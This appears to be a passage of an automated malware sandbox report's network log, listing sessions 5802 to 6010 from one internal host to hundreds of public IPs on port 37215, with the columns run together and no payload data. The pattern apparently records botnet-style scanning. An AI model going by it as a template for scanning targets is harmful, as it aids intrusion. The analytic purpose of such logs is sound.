                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5802192.168.2.1343954100.228.19.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5803192.168.2.1353900216.8.6.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5804192.168.2.1352444157.51.80.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5805192.168.2.135435441.57.219.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5806192.168.2.1339162197.146.91.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5807192.168.2.1356044197.237.89.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5808192.168.2.1350044183.84.62.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5809192.168.2.1356726175.143.19.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5810192.168.2.134436050.22.132.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5811192.168.2.1353258157.102.10.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5812192.168.2.133701041.138.173.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5813192.168.2.133529041.20.36.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5814192.168.2.1334914197.197.18.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5815192.168.2.1359194197.50.9.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5816192.168.2.1345206197.185.212.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5817192.168.2.1358656157.136.120.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5818192.168.2.1350300157.185.217.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5819192.168.2.1335626157.25.163.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5820192.168.2.13592484.226.151.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5821192.168.2.1336484157.240.69.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5822192.168.2.1356712186.168.84.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5823192.168.2.1333486206.140.149.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5824192.168.2.1357394197.187.159.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5825192.168.2.134921841.253.254.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5826192.168.2.134559041.59.254.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5827192.168.2.1340784197.69.236.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5828192.168.2.1347720197.102.82.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5829192.168.2.135503241.75.137.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5830192.168.2.1341276197.172.97.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5831192.168.2.1345576197.109.155.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5832192.168.2.1360266197.177.148.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5833192.168.2.134937241.55.114.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5834192.168.2.1346268197.59.92.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5835192.168.2.1360674158.138.158.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5836192.168.2.1357896197.6.112.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5837192.168.2.135217441.201.248.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5838192.168.2.1357404157.232.38.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5839192.168.2.1357388147.61.88.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5840192.168.2.1341856197.143.240.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5841192.168.2.1350560197.90.201.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5842192.168.2.134828641.234.204.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5843192.168.2.134526441.162.196.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5844192.168.2.1357440197.224.91.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5845192.168.2.133781025.224.14.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5846192.168.2.1351688157.82.239.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5847192.168.2.136007452.142.0.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5848192.168.2.134035241.206.80.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5849192.168.2.135352849.165.83.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5850192.168.2.1351638157.168.26.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5851192.168.2.134286041.87.140.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5852192.168.2.1349266186.146.161.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5853192.168.2.1360240197.252.117.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5854192.168.2.133506041.72.212.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5855192.168.2.1340924211.146.88.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5856192.168.2.1344068185.76.31.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5857192.168.2.1347828197.227.230.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5858192.168.2.1358062157.220.193.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5859192.168.2.1333680197.81.208.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5860192.168.2.1350800197.244.86.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5861192.168.2.134419241.239.144.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5862192.168.2.134020241.253.162.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5863192.168.2.1345428157.173.204.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5864192.168.2.134027081.234.254.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5865192.168.2.135631241.65.239.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5866192.168.2.135764641.2.211.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5867192.168.2.135692441.150.218.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5868192.168.2.135980879.111.98.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5869192.168.2.134872241.188.203.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5870192.168.2.1358372197.181.154.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5871192.168.2.134258270.42.22.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5872192.168.2.135394413.81.38.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5873192.168.2.133824441.24.70.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5874192.168.2.1347020197.41.11.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5875192.168.2.1346746131.82.51.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5876192.168.2.133695476.49.60.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5877192.168.2.135628841.198.205.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5878192.168.2.1356524157.14.212.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5879192.168.2.1348048197.70.109.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5880192.168.2.135183841.155.124.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5881192.168.2.1336892208.128.70.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5882192.168.2.1354926197.88.165.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5883192.168.2.1353828133.32.93.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5884192.168.2.1342790197.145.130.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5885192.168.2.1336274157.128.157.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5886192.168.2.1355090197.11.115.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5887192.168.2.135634041.145.87.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5888192.168.2.1358344197.35.248.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5889192.168.2.133750441.212.49.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5890192.168.2.135150241.230.199.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5891192.168.2.135141641.212.115.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5892192.168.2.1336394157.72.134.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5893192.168.2.1334232197.228.159.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5894192.168.2.1352690157.65.194.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5895192.168.2.1349208197.33.70.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5896192.168.2.135625041.83.228.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5897192.168.2.134340641.176.87.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5898192.168.2.133741641.91.39.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5899192.168.2.1333164157.217.237.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5900192.168.2.1345686157.64.92.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5901192.168.2.1342356157.12.251.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5902192.168.2.1339114157.65.109.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5903192.168.2.134468299.201.74.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5904192.168.2.1358112197.129.255.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5905192.168.2.133413041.240.91.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5906192.168.2.1335388131.180.78.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5907192.168.2.1338316197.128.126.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5908192.168.2.133715841.78.67.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5909192.168.2.1356614196.55.127.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5910192.168.2.134681069.121.124.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5911192.168.2.134905641.156.94.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5912192.168.2.133949041.122.218.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5913192.168.2.1337408157.29.67.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5914192.168.2.135920441.106.220.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5915192.168.2.1356380197.70.140.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5916192.168.2.1338478157.20.65.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5917192.168.2.135751041.176.176.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5918192.168.2.135493041.52.33.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5919192.168.2.1355938197.142.70.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5920192.168.2.1357678157.114.237.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5921192.168.2.1350694197.83.187.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5922192.168.2.1342494157.103.85.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5923192.168.2.1353326157.168.197.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5924192.168.2.1333324157.34.44.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5925192.168.2.135285093.82.233.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5926192.168.2.1348226138.184.183.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5927192.168.2.1353726157.231.193.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5928192.168.2.1351244197.225.213.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5929192.168.2.135437641.208.3.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5930192.168.2.134530441.141.179.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5931192.168.2.134438841.64.53.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5932192.168.2.134682841.223.162.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5933192.168.2.1355940157.78.19.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5934192.168.2.134975841.86.47.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5935192.168.2.1339498197.145.173.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5936192.168.2.133565013.113.247.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5937192.168.2.1334296197.163.27.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5938192.168.2.133338641.234.229.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5939192.168.2.1347898197.203.26.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5940192.168.2.1358200157.4.209.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5941192.168.2.1340526157.205.56.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5942192.168.2.1353654157.149.203.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5943192.168.2.1339914157.207.15.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5944192.168.2.133478441.116.229.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5945192.168.2.1354848197.155.158.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5946192.168.2.1336714157.149.72.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5947192.168.2.1358204157.204.46.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5948192.168.2.1356504198.214.233.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5949192.168.2.1358182197.30.241.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5950192.168.2.1358732197.168.89.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5951192.168.2.1336504157.80.95.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5952192.168.2.135881441.82.194.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5953192.168.2.134677241.85.79.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5954192.168.2.133531641.237.243.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5955192.168.2.1341376157.0.252.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5956192.168.2.133656841.181.203.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5957192.168.2.134482841.9.165.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5958192.168.2.1348718197.253.82.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5959192.168.2.1334688110.104.3.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5960192.168.2.1337024197.15.217.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5961192.168.2.1346728197.100.32.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5962192.168.2.1351194197.69.137.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5963192.168.2.1355786111.48.123.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5964192.168.2.135441041.107.245.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5965192.168.2.1345972157.8.47.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5966192.168.2.134890282.244.225.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5967192.168.2.134549841.58.98.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5968192.168.2.1340518157.154.219.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5969192.168.2.1345326157.202.54.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5970192.168.2.133368441.54.216.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5971192.168.2.135892689.88.111.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5972192.168.2.1333540157.67.252.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5973192.168.2.134604241.150.159.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5974192.168.2.133763441.37.83.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5975192.168.2.1346186157.131.237.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5976192.168.2.1337324197.79.138.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5977192.168.2.136074441.231.49.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5978192.168.2.1336092157.13.144.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5979192.168.2.1350078157.226.109.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5980192.168.2.1352432157.183.52.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5981192.168.2.1345696157.34.118.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5982192.168.2.135519441.143.40.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5983192.168.2.1354324157.160.236.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5984192.168.2.1356756134.87.53.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5985192.168.2.135653241.222.119.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5986192.168.2.1341650197.67.98.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5987192.168.2.1335926157.98.16.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5988192.168.2.133443679.14.6.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5989192.168.2.1348520197.207.212.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5990192.168.2.1354448107.222.118.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5991192.168.2.134257841.187.236.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5992192.168.2.133577664.88.243.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5993192.168.2.1342102197.93.126.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5994192.168.2.1360162157.8.5.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5995192.168.2.135596041.211.144.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5996192.168.2.133290241.91.76.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5997192.168.2.135131841.222.244.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5998192.168.2.134071441.161.236.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5999192.168.2.1358666211.196.52.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6000192.168.2.1335810157.127.160.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6001192.168.2.134989641.157.196.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6002192.168.2.1336316135.233.219.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6003192.168.2.1351238157.0.121.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6004192.168.2.134656041.47.196.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6005192.168.2.134914041.30.124.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6006192.168.2.1350102147.91.151.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6007192.168.2.133986641.76.20.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6008192.168.2.1337496157.47.112.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6009192.168.2.1360076192.104.72.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6010192.168.2.1358498197.129.253.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
